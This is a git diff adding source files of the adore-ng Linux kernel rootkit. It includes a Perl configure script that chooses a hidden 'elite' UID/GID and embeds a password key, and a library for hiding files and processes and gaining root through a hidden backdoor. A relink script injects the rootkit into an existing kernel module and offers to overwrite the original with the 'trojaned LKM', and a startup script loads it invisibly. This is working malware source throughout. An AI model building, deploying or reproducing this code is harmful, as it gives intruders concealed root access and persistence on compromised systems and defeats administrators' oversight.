+# find elite UID+GID
+#
+sub get_elite_id()
+{
+        my $uid = 0, $p;
+        if ($bw == 2) {
+                $p = "S";
+        } elsif ($bw == 4) {
+                $p = "I";
+        } else {
+                print "Nuts! Stupid byte-width of $bw. Use either 2 or 4.\n";
+                exit;
+        }
+
+        open(R, "/dev/random") or die "$!";
+        while (defined(getpwuid($uid))) {
+                read R, $uid, $bw;
+                $uid = unpack($p, $uid);
+        }
+        read R, $gid, $bw;
+        close(R);
+        $gid = unpack($p, $gid);
+        return ($uid, $gid);
+}
+
+
+#
+sub check_smp()
+{
+        if (`uname -a` =~ "SMP") {
+                return "YES";
+        } else {
+                return "NO";
+        }
+}
+
+
+sub check_26()
+{
+        if (`uname -r` =~ /2\.6/) {
+                return "YES";
+        } else {
+                return "NO";
+        }
+}
+
+
+# check for CONFIG_MODVERSIONS=y
+sub check_modversions()
+{
+        open I, "</proc/ksyms" or die "open(/proc/ksyms) $!";
+        while (<I>) {
+                if (/kernel_thread_R.+/) {
+                        close I;
+                        return "YES";
+                }
+                if (/kernel_thread/) {
+                        close I;
+                        return "NO";
+                }
+        }       
+        print "WARN: Can't find kernel_thread!! Using \"NO\"!";
+        return "NO";
+}
+
+#
+# Look for loaded modules
+#
+sub check_modules()
+{
+        print "Loaded modules:\n";
+        system("cat /proc/modules");
+}
+
+#
+# Look where insmod is located
+#
+sub check_insmod()
+{
+        my $s;
+        print "Checking 4 insmod ... ";
+        foreach (qw(/bin /sbin /usr/sbin /usr/bin)) {
+                if (-x ($s = "$_/insmod")) {
+                        print "found $s -- OK\n";
+                        return $s;
+                }
+        }
+        print "WARN: No insmod found in /bin, /sbin, /usr/sbin, /usr/bin! Fix init-script by hand!\n";
+        return "insmod";
+}
+
+#
+# RH 7 has 'kgcc'
+#
+sub check_cc()
+{
+        my $r;
+        if (-x "/usr/bin/kgcc") {
+                $r = "kgcc";
+        } else {
+                $r = "cc";
+        }
+        return $r;
+}
+
+
+##############################
+#
+# main()
+#
+##############################
+
+print "\nStarting adore configuration ...\n\n";
+($uid, $gid) = get_elite_id();
+
+print "Checking 4 ELITE_UID + ELITE_GID ... ";
+print "found $uid, $gid\n";
+
+
+print "Checking 4 SMP ... ", $has_smp = check_smp(), "\n";
+
+print "Checking 4 MODVERSIONS ... ", $has_modversions = check_modversions(), "\n";
+
+print "Checking for kgcc ... ";
+print "found ", $cc = check_cc(), "\n";
+
+
+$insmod = check_insmod();
+print "\n";
+
+check_modules();
+
+$pwd = get_pass();
+
+
+print "\nPreparing '.' for hiding ... ";
+chown($uid, $gid, ".") or print "(failed)";
+
+print "\n\n";
+print "Creating Makefile ...\n";
+
+print "\n\a*** Edit adore-ng.h for the hidden services ***\n";
+
+#
+# create an Makefile backup.
+#
+
+$date = `date`;
+$date =~ tr/ /_/;
+
+system("touch Makefile;cp Makefile Makefile_$date");
+
+#
+# write Makefile
+#
+
+open(O, ">Makefile") or die "open(Makefile) $!";
+
+print O "#\nCC=$cc\nCFLAGS=-O2 -Wall\n\n";
+print O "#CFLAGS+=-mcpu=i486\nINC=-I/usr/src/linux/include";
+print O "\nCFLAGS+=-DELITE_UID=${uid}U -DELITE_GID=${gid}U\nCFLAGS+=-DCURRENT_ADORE=$current_adore\n".
+        "CFLAGS+=-DADORE_KEY=\\\"$pwd\\\"\n\n";
+
+if ($has_smp eq "NO") {
+        print O "#";    
+}
+
+print O "CFLAGS+=-D__SMP__\n";
+
+
+print O "\n";
+
+if ($has_modversions eq "NO") {
+        print O "#";
+}
+
+print O<<_EOF_;
+CFLAGS+=-DMODVERSIONS
+
+all:    adore-ng ava cleaner symsed
+
+adore-ng: adore-ng.c
+        rm -f adore-ng.o
+        \$(CC) -c \$(INC) \$(CFLAGS) adore-ng.c -o adore-ng.o
+        \$(CC) -c \$(INC) \$(CFLAGS) -DRELINKED adore-ng.c -o zero.o
+
+ava: ava.c libinvisible.c
+        \$(CC) \$(CFLAGS) ava.c libinvisible.c -o ava
+
+cleaner: cleaner.c
+        \$(CC) \$(INC) -c \$(CFLAGS) cleaner.c
+
+symsed: symsed.c
+        \$(CC) -O2 symsed.c -o symsed
+clean:
+        rm -f core ava symsed *.o
+_EOF_
+
+#
+# Done :>
+#
+
+close O;
+
diff --git a/other/adore-ng/irq_vectors.h b/other/adore-ng/irq_vectors.h
new file mode 100644
index 0000000..753c643
--- /dev/null
+++ b/other/adore-ng/irq_vectors.h
@@ -0,0 +1,10 @@
+#ifndef NR_IRQS
+#define NR_IRQS 1
+#endif
+
+#ifndef NR_IRQ_VECTORS
+#define NR_IRQ_VECTORS 1
+#endif
+
+
+
diff --git a/other/adore-ng/libinvisible.c b/other/adore-ng/libinvisible.c
new file mode 100644
index 0000000..a8aded4
--- /dev/null
+++ b/other/adore-ng/libinvisible.c
@@ -0,0 +1,169 @@
+/*
+ * Copyright (C) 1999/2000 Stealth.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Stealth.
+ * 4. The name Stealth may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+
+/* Upper layer to be independant from implementation of
+ * kernel-hacks.
+ * Just write appropriate functions for new kernel-mods,
+ * and ava.c will be happy.
+ */
+
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <errno.h>
+#include <fcntl.h>
+
+#include "libinvisible.h"
+
+int getresuid(uid_t *, uid_t *, uid_t *);
+
+#ifdef linux
+adore_t *adore_init()
+{
+        int fd;
+        uid_t r, e, s;
+        adore_t *ret = calloc(1, sizeof(adore_t));
+
+        fd = open("/proc/"ADORE_KEY, 0);
+        close(fd);
+        getresuid(&r, &e, &s);
+
+        if (s == getuid() && getuid() != CURRENT_ADORE) {
+                fprintf(stderr,
+                        "Tried to authorized myself. No luck, no adore?\n");
+                ret->version = -1;
+        } else
+                ret->version = s;
+        return ret;
+}
+
+/* Hide a file
+ */
+int adore_hidefile(adore_t *a, char *path)
+{
+        return lchown(path, ELITE_UID, ELITE_GID);
+}
+
+/* Unhide a file
+ */
+int adore_unhidefile(adore_t *a, char *path)
+{
+        return lchown(path, 0, 0);
+}
+
+/* Hide a process with PID pid
+ */
+int adore_hideproc(adore_t *a, pid_t pid)
+{
+        char buf[1024];
+
+        if (pid == 0)
+                return -1;
+
+        sprintf(buf, "/proc/hide-%d", pid);
+        close(open(buf, O_RDONLY));
+        return 0;
+}
+
+/* make visible again */
+int adore_unhideproc(adore_t *a, pid_t pid)
+{
+        char buf[1024];
+
+        if (pid == 0)
+                return -1;
+        sprintf(buf, "/proc/unhide-%d", pid);
+        close(open(buf, O_RDONLY));
+        return 0;
+}
+
+/* permanently remove proc
+ */
+int adore_removeproc(adore_t *a, pid_t pid)
+{
+        printf("Not supported in this version.\n");
+        return 1;
+}
+
+/* use the hidden setuid(0)-like backdoor
+ */
+int adore_makeroot(adore_t *a)
+{
+        /* now already handled by adore_init() */
+        close(open("/proc/fullprivs", O_RDONLY));
+        if (geteuid() != 0)
+                return -1;
+        return 0;
+}
+
+/* return version number of installed adore
+ */
+int adore_getvers(adore_t *a)
+{
+        if (!a)
+                return -1;
+        return a->version;
+}
+
+int adore_free(adore_t *a)
+{
+        free(a);
+        return 0;
+}
+
+/* uninstall adore
+ */
+int adore_uninstall(adore_t *a)
+{
+        close(open("/proc/uninstall", O_RDONLY));
+        return 0;
+}
+
+/* disappeared in 0.3 */
+int adore_disable_logging(adore_t *a)
+{
+        return -ENOENT;
+}
+
+/* ditto */
+int adore_enable_logging(adore_t *a)
+{
+        return -ENOENT;
+}
+
+#else
+#error "Not supported architecture (Not Linux)."
+#endif /* linux */
+
diff --git a/other/adore-ng/libinvisible.h b/other/adore-ng/libinvisible.h
new file mode 100644
index 0000000..179f6eb
--- /dev/null
+++ b/other/adore-ng/libinvisible.h
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 1999/2000 Stealth.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Stealth.
+ * 4. The name Stealth may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+
+#ifndef _LIBINVISIBLE_H_
+#define _LIBINVISIBLE_H_
+
+#include <sys/types.h>
+
+/* Whenever you change this, do so in adore.c!!!
+ */
+#define SIGINVISIBLE 100
+#define SIGVISIBLE   101
+#define SIGREMOVE    102
+
+typedef struct adore_t {
+        int version;
+        /* nothing more yet */
+} adore_t;
+
+adore_t *adore_init();
+
+/* adore_t as first argument is something like
+ * 'this' in C++.
+ * It isn't much used yet, but good for later
+ * extensions.
+ */
+int adore_hidefile(adore_t *, char *);
+int adore_unhidefile(adore_t *, char *);
+
+int adore_hideproc(adore_t *, pid_t);
+int adore_removeproc(adore_t *, pid_t);
+int adore_unhideproc(adore_t *, pid_t);
+
+int adore_makeroot(adore_t *);
+int adore_free(adore_t *);
+int adore_getvers(adore_t *);
+int adore_free(adore_t *);
+
+int adore_disable_logging(adore_t *);
+int adore_enable_logging(adore_t *);
+
+int adore_uninstall(adore_t *);
+
+#endif
+
diff --git a/other/adore-ng/relink b/other/adore-ng/relink
new file mode 100755
index 0000000..368a3a3
--- /dev/null
+++ b/other/adore-ng/relink
@@ -0,0 +1,46 @@
+#!/usr/bin/perl
+
+$| = 1;
+open(I, "</proc/modules") || die $!;
+
+print "The following LKMs are available:\n\n";
+$i = 0;
+while ($_ = <I>) {
+        if (($i++ % 5) == 0) {
+                print "\n";
+        }
+        /(\w+) /;
+        $module = $1;
+        print "$module ";
+}
+
+print "\n\nChose one: ";
+$lkm = <STDIN>;
+$lkm =~ s/\n//;
+print "Choice was >>>$lkm<<<\n";
+print "Searching for $lkm.o ...\n";
+
+$u = `uname -r`;
+$u =~ s/\n//;
+$lkm_path = `find /lib/modules/$u -name $lkm.o`;
+$lkm_path =~ s/\n//;
+if ($lkm_path eq "") {
+        print "No LKM with that name found!\n";
+        exit;
+}
+
+print "Found $lkm_path!\n";
+
+system("cp $lkm_path t.o");
+system("./symsed t.o zero;ld -r t.o zero.o -o z.o; rm -f t.o");
+print "\nCopy trojaned LKM back to original LKM? (y/n)\n";
+
+while ($yn !~ /^(y|n)$/i) {
+        $yn = <STDIN>;
+        $yn =~ s/\n//;
+}
+
+if ($yn =~ /y/i) {
+        system("cp z.o $lkm_path");
+}
+
diff --git a/other/adore-ng/startadore b/other/adore-ng/startadore
new file mode 100755
index 0000000..a30751e
--- /dev/null
+++ b/other/adore-ng/startadore
@@ -0,0 +1,11 @@
+#!/bin/sh
+
+# Use this script to bootstrap adore!
+# It will make adore invisible. You could also
+# insmod adore without $0 but then its visible.
+
+insmod ./adore-ng.o
+insmod ./cleaner.o
+rmmod cleaner
+
+
diff --git a/other/adore-ng/symsed.c b/other/adore-ng/symsed.c
new file mode 100644
index 0000000..3755367
--- /dev/null
+++ b/other/adore-ng/symsed.c
@@ -0,0 +1,52 @@
+#include <stdio.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <string.h>
+#include <errno.h>
+#include <stdlib.h>
+
+
+int main(int argc, char **argv)
+{
+        int fd = 0;
+        char *ptr = NULL, *orig_ptr = NULL;
+        struct stat st;
+
+        if (argc != 3) {
+                printf("Usage: %s <file> <subst>\n", *argv);
+                exit(1);
+        }
+        if (strlen(argv[2]) >= strlen("init_module")) {
+                printf("Can't only substitute symbols by strings with at most"
+                       "%u characters.\n", strlen("init_module"));
+                exit(2);
+        }
+
+        if ((fd = open(argv[1], O_RDWR)) < 0) {
+                perror("open");
+                exit(errno);
+        }
+        if (fstat(fd, &st) < 0) {
+                perror("fstat");
+                exit(errno);
+        }
+        ptr = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
+        orig_ptr = ptr;
+        if (!ptr) {
+                perror("mmap");
+                exit(errno);
+        }
+        for (; ptr < orig_ptr + st.st_size; ++ptr) {
+                if (strncmp(ptr, "init_module", strlen("init_module")) == 0 ||
+                    strncmp(ptr, "cleanup_module", strlen("cleanup_module")) == 0) {
+                        memcpy(ptr, argv[2], strlen(argv[2]));
+                        ptr += strlen(argv[2]);
+                }
+        }
+        munmap(ptr, st.st_size);
+        return 0;       
+}
+
diff --git a/other/adore-ng/visible-start.c b/other/adore-ng/visible-start.c
new file mode 100644
index 0000000..fc5b8d1
--- /dev/null
+++ b/other/adore-ng/visible-start.c
@@ -0,0 +1,22 @@
+/* Due to new proc hiding technique, from a hidden shell
+ * there cant be any processes started which are visible
+ * since the parent (shell) is invisible. So we have to 
+ * make init the parent and then start the process. Then
+ * it is visible
+ */
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+
+
+int main(int argc, char **argv, char **env)
+{
+        if (fork()) {
+                exit(0);
+        }
+        if (argc > 1)
+                execve(argv[1],argv+1, env);
+        return -1;
+}
+
+